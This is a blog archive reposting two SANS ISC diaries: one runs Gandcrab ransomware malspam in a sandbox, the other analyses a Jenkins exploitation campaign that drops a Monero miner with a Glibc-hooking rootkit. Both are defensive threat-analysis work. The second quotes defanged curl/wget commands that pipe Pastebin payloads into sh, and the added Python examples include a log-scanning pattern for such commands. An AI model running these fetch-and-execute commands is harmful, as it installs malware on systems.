
Archive for May 7th, 2019

Email roulette, May 2019, (Wed, May 8th)

Introduction

For today’s diary I play a game of email roulette. My version of email roulette is picking a recent item of malicious spam (malspam), running the associated email attachment in a live sandbox, and identifying the malware. I acquired a recent malspam example through VirusTotal (VT) Intelligence. Let’s see what the roulette wheel gives us today!

Searching for malspam attachments in VT Intelligence

VT Intelligence is a subscription service, and from what I understand, it’s fairly expensive. Fortunately I have access through my employer. In the VT Intelligence search window, I used the following parameters:

tag:attachment fs:2019-05-07+ p:3+

This returned anything tagged as an email attachment, first seen on or after 2019-05-07, with at least 3 vendors identifying an item as malicious.  After the results appeared, I sorted by the most recent submissions.


Shown above:  Searching and sorting in the VT Intelligence portal.


Shown above:  Results sorted by most recent at the time of my search.

The three most recent results I saw were 7-zip archives (.7z files).  The file names did not use ASCII characters, but were base64 encoded.  The base64 string represents UTF-8 characters, where the format is name:"=?utf-8?B?[base64 string]?="
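The =?utf-8?B?...?= form described above is an RFC 2047 encoded-word. The following added example (not part of the original diary) decodes such attachment names from an .eml file and hashes each attachment so it can be compared with published indicators; the file name, addresses and payload in the sample are constructed.

```python
import base64
import email
import hashlib
from email.header import decode_header, make_header

# Constructed sample: the file name and payload are made up for this example.
NAME = "문서.7z"
PAYLOAD = b"7z\xbc\xaf\x27\x1c" + b"\x00" * 26  # 7z signature plus filler
ENCODED_NAME = "=?utf-8?B?" + base64.b64encode(NAME.encode("utf-8")).decode() + "?="

SAMPLE_EML = "\r\n".join([
    "From: sender@example.com",
    "To: recipient@example.com",
    "Subject: constructed sample",
    "MIME-Version: 1.0",
    'Content-Type: multipart/mixed; boundary="BOUNDARY"',
    "",
    "--BOUNDARY",
    "Content-Type: text/plain; charset=utf-8",
    "",
    "See attachment.",
    "--BOUNDARY",
    "Content-Type: application/octet-stream",
    "Content-Transfer-Encoding: base64",
    f'Content-Disposition: attachment; filename="{ENCODED_NAME}"',
    "",
    base64.b64encode(PAYLOAD).decode(),
    "--BOUNDARY--",
    "",
]).encode("ascii")


def list_attachments(raw_eml: bytes) -> list:
    """Return raw name, decoded name, size and SHA256 for each attachment."""
    results = []
    for part in email.message_from_bytes(raw_eml).walk():
        raw_name = part.get_filename()
        if raw_name is None:
            continue  # container or body part, not an attachment
        # decode_header() splits RFC 2047 encoded-words; make_header() joins
        # the decoded pieces back into one Unicode string.
        decoded = str(make_header(decode_header(raw_name)))
        data = part.get_payload(decode=True) or b""
        results.append({"raw_name": raw_name, "name": decoded, "size": len(data),
                        "sha256": hashlib.sha256(data).hexdigest()})
    return results


if __name__ == "__main__":
    for item in list_attachments(SAMPLE_EML):
        print(item)
```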

I picked the most recent result and selected the relations tab, which revealed the associated malspam.  Then I retrieved that email from VT Intelligence.


Shown above:  Pivoting on the attachment to find its parent email.


Shown above:  The email opened in Thunderbird on a Windows 7 host.

The attached 7-zip archive contained 3 files with different names, but they all had the same file hash, so they were the same malware. I extracted them and ran one on a vulnerable Windows host. The result was a Gandcrab ransomware infection.


Shown above:  Encrypted files and the ransom note on my infected Windows host.

Indicators

The following are indicators associated with this infection:

SHA256 hash: 39f97e750a8ebcc68a5392584c9fd8edc934e978d6495d3ae430cb7ee3275ffe

  • File size: 157,810 bytes
  • File description: Example of Korean malspam (.eml file) pushing Gandcrab

SHA256 hash: 5444841becddce7ef2601752df63db2a9d067d46a359d8b0288da2ebf494ff41

  • File size: 112,792 bytes
  • File description: 7-zip archive (.7z file) attached to Korean malspam

SHA256 hash: df53498804b4e7dbfb884a91df7f8b371de90d6908640886f929528f1d6bd0cc

  • File size: 173,568 bytes
  • File description: Gandcrab executables (.exe files) extracted from the above .7z archive
  • Any.Run sandbox analysis

Final words

This round of email roulette gave us a Gandcrab ransomware infection.  What type of malware might I find next?  Perhaps we’ll know when I try this again next month for another diary.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.


Vulnerable Apache Jenkins exploited in the wild, (Tue, May 7th)

An ongoing malicious campaign is looking for vulnerable Apache Jenkins installations to deploy a Monero cryptominer. The dropper uses sophisticated techniques to hide its presence on the system, to move laterally and to look for new victims on the internet. It also downloads and runs the miner software – of course.

The exploited vulnerability, CVE-2018-1000861 [1], was published in December 2018. It affects the Stapler web framework used by Jenkins 2.153 and earlier. It may allow attackers to invoke methods on Java objects by accessing crafted URLs.

Looking for publicly available exploits for this vulnerability, I could find a detailed proof of concept published early March this year.

After analyzing the threat which attacked one of my honeypots, I created the diagram shown in the picture below. Follow the numbers in blue to understand each step.

Vulnerability Exploitation

In the picture below, you can see the exploitation occurring. 

Notice that there is a base64 encoded content piped to bash for execution. Decoding this content, it was possible to see that this campaign is using Pastebin as the C2:

(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh

The content of the paste ‘wDBa7jCQ’ is no longer available, but it was a command that fetched another paste:

(curl -fsSL hxxps://pastebin[.]com/raw/D8E71JBJ||wget -q -O- hxxps://pastebin[.]com/raw/D8E71JBJ)|sed 's/\r//'|sh

The content of the ‘D8E71JBJ’ paste is also no longer available, but it was the shell script shown in the following images.
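For defenders reviewing web server logs, the pattern described above (a base64 blob that decodes to a download piped into a shell) can be searched for directly. The following is an added example, not code from the original diary: the log lines, addresses, request path and parameter name are constructed placeholders, and only the encoded command is the defanged one quoted above.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
FETCH_EXEC = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash)\b", re.S)
URL_HOST = re.compile(r"h(?:tt|xx)ps?://([^/\s|)'\"]+)")

# Constructed log lines: addresses, paths and parameters are placeholders.
# Only the encoded command is the (defanged) one quoted in the diary.
CMD = ("(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||"
       "wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh")
B64 = quote(base64.b64encode(CMD.encode()).decode(), safe="")
SAMPLE_LOG = [
    '198.51.100.7 "GET /static/app.js HTTP/1.1" 200',
    '198.51.100.7 "GET /login?sid=0123456789abcdef0123456789abcdef HTTP/1.1" 200',
    '203.0.113.9 "GET /PLACEHOLDER?arg=echo%20' + B64
    + '%7Cbase64%20-d%7Cbash HTTP/1.1" 200',
]


def defang(text):
    """Keep decoded URLs non-clickable in reports."""
    return text.replace("http", "hxxp")


def find_staged_downloads(lines):
    """Return (line_no, command, hosts) for each base64 blob that decodes to
    a download piped into a shell."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        for match in B64_RUN.finditer(unquote(line)):
            token = match.group(0).rstrip("=")
            try:
                padded = token + "=" * (-len(token) % 4)
                text = base64.b64decode(padded, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not base64, or not text: ignore
            if FETCH_EXEC.search(text):
                hosts = sorted(set(URL_HOST.findall(text)))
                findings.append((line_no, defang(text), hosts))
    return findings


if __name__ == "__main__":
    for finding in find_staged_downloads(SAMPLE_LOG):
        print(finding)
```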

The Dropper

The dropper named “Kerberods” (not “Kerberos” as the protocol) caught my attention due to the way it is packed and the way it acts if it has ‘root’ privileges on the machine.

After analyzing the binary, I could see that the packer used was a custom version of ‘UPX’. UPX is open source software, and there are many ways it can be modified to make a file hard to unpack with the regular UPX version. There is a great presentation on this subject by @unixfreaxjp [2] called ‘Unpacking the non-unpackable’ which shows different ways to fix ELF headers in order to unpack files.

Fortunately, in this case, the UPX customizations involved just the modification of the magic constant UPX_MAGIC_LE32 from ‘UPX’ to some other three letters. Thus, by reverting it to UPX in the different parts of the binary, it was possible to unpack the binary with the regular version of UPX.

The Glibc hooks

The other interesting part is the way ‘Kerberods’ acts to persist and hide itself if it has root privileges on the machine.

If that is the case, it drops, compiles and loads a library into the operating system that hooks different functions of Glibc to modify their behavior. In other words, it acts like a rootkit.

In the image below it is possible to see that the function ‘open’ will now check for some strings in the ‘pathname’ to act in a different way. The intention is to prevent anyone (including root) from opening the binary ‘khugepageds’, which is the cryptominer, the ‘ld.so.preload’, which is the file that loads the malicious library and the library ‘libpamcd.so’ itself.

 

Another hook, to show one more example, hides the network connection to the private mining pool and the scan for open Redis servers, as seen in the image below.
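A library loaded through ld.so.preload is mapped into every dynamically linked process started afterwards, so it shows up in /proc/<pid>/maps even when the file itself cannot be opened. The following added example (not from the original diary) flags such mappings in collected maps listings; the sample listings and the library's directory are constructed, the trusted directory list is an assumption, and it assumes the maps files remain readable, which the diary does not confirm.

```python
import posixpath
from collections import defaultdict

IOC_NAMES = {"libpamcd.so", "khugepageds"}  # file names given in the diary
# Assumption: directories the distribution installs shared libraries into.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")
DELETED = " (deleted)"

# Constructed /proc/<pid>/maps excerpts. The directory holding libpamcd.so is
# made up; the diary does not say where the library is dropped.
LIBC = "7f1a2c000000-7f1a2c1e7000 r-xp 00000000 08:01 2201 /lib/x86_64-linux-gnu/libc-2.27.so\n"
HOOK = "7f1a2c400000-7f1a2c402000 r-xp 00000000 08:01 9001 /usr/local/lib/libpamcd.so\n"
STACK = "7ffd4a1f0000-7ffd4a211000 rw-p 00000000 00:00 0 [stack]\n"
SAMPLE_MAPS = {
    1: "00400000-004b6000 r-xp 00000000 08:01 77 /sbin/init\n" + STACK,
    640: "55aa00000000-55aa000c0000 r-xp 00000000 08:01 1400 /usr/sbin/sshd\n"
         + LIBC + HOOK + STACK,
    812: "55d0c0a00000-55d0c0a08000 r-xp 00000000 08:01 1311 /usr/bin/cat\n"
         + LIBC + HOOK + STACK,
}


def executable_objects(maps_text):
    """Yield file paths that back executable mappings in one maps listing."""
    for line in maps_text.splitlines():
        fields = line.split(None, 5)  # address perms offset dev inode path
        if len(fields) == 6 and "x" in fields[1] and fields[5].startswith("/"):
            yield fields[5]


def suspicious_mappings(maps_by_pid):
    """Map each suspicious object path to the sorted PIDs that have it loaded."""
    hits = defaultdict(set)
    for pid, text in maps_by_pid.items():
        for path in executable_objects(text):
            clean = path[:-len(DELETED)] if path.endswith(DELETED) else path
            name = posixpath.basename(clean)
            is_lib = name.endswith(".so") or ".so." in name
            # Flag the diary's file names, and any shared library that is
            # mapped from outside the trusted library directories.
            if name in IOC_NAMES or (is_lib and not clean.startswith(TRUSTED_LIB_DIRS)):
                hits[clean].add(pid)
    return {path: sorted(pids) for path, pids in hits.items()}


if __name__ == "__main__":
    print(suspicious_mappings(SAMPLE_MAPS))
```

On a suspect host, collect the maps listings with a statically linked tool or from an offline image, since dynamically linked utilities run through the hooked Glibc functions.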

 

Indicators of Compromise (IOCs)

Filesystem
74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c8
bab27f611518dc55b00b1a9287bdb8e059c4f4cc1607444f40e0c45d5842994f
43a00e0dd57d110d1c88b18234185267ca2a79f8ae1905bef4ba225144c992d2
 

Network
SYSTEMTEN[.]ORG:51640
 


Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.
